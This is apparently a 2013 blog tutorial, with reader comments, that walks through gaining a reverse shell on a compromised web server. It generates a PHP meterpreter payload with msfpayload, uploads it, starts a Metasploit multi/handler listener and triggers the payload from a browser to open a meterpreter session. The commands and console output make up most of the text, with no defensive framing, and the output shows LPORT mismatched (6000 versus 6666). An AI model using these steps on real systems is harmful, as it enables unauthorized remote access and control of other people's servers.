Php reverse shell with metasploit

2 Flares Filament.io 2 Flares ×

After hacking a web application or server to such an extent that you can upload files to it, the next thing to try is get a proper shell on the system. The most common approach is to create reverse shells. In this approach first a listener program is run on the hacker's machine and then a program/payload/script is run on the target machine such that it connects back to the hacker's machine to offer a shell/terminal.

Creating reverse shells using php scripts is generally quite easy and can be accomplished with just a small php and a program like netcat. Netcat would run as a listener (a socket server actually) and the php script has to be run on the victim server so that it connects back.

In this example we are going to create reverse shells in php using metasploit. Yes, its too big a tool for such a small task but looks cool anyway.

To brief up the basics about reverse shells remember that it has 2 components. First is the listener on local/hacker system that waits for incoming connections, and the second is the payload script/program that runs on target computer and is configured to connect to the listener and offer a shell.

listener (hacker machine) <===== reverse shell payload (victim machine)

Once the listener is connected, it can gets a shell which can be used to run any command (limited to the user privilege) on the target system.

php payload

So the first step is to create our payload program. This is done using the msfpayload command and looks like this

# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6000 R > exploit.php

The above command would create a file called exploit.php which is the reverse shell payload. It is just a plain php script that is configured according to the LHOST and LPORT parameters.

Now upload the exploit.php to the target system. Wait, do not run it yet. First we need to start the listener as shown in the next step.

Start listener

Once the payload is uploaded, the next thing to do is to start our listener which will catch the incoming connection offer. Start msfconsole and run the following commands

msf > use exploit/multi/handler 
msf  exploit(handler) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf  exploit(handler) > set LPORT 6000
LPORT => 6666
msf  exploit(handler) > set payload php/meterpreter/reverse_tcp 
payload => php/meterpreter/reverse_tcp
msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.4:6000 
[*] Starting the payload handler...






Now the listener is ready. Now its time to run the php script on the server. Its uploaded, and now can be run by opening from the browser like a normal url.

http://targetmachine/some/path/exploit.php

As soon as the script starts running, msfconsole will indicate connection and meterpreter session would come up

[*] Sending stage (39217 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.4:6000 -> 192.168.1.101:43400) at 2013-03-04 17:29:18 +0530

meterpreter >

Now that meterpreter is up, its time to play with the system.
Since it is a php based reverse shell, it is not dependant on the target platform OS in anyways and can run on windows and linux alike.

Last Updated On : 4th March 2013

Subscribe to get updates delivered to your inbox

  • Awn Umar

    Do we need to port forward port 6000?

    • sdfv

      If you are behind NAT yes

  • Ram

    msf exploit(handler) > set LPORT 6000
    LPORT => 6666
    ?????

2 Flares Twitter 2 Facebook 0 Google+ 0 LinkedIn 0 StumbleUpon 0 Filament.io 2 Flares ×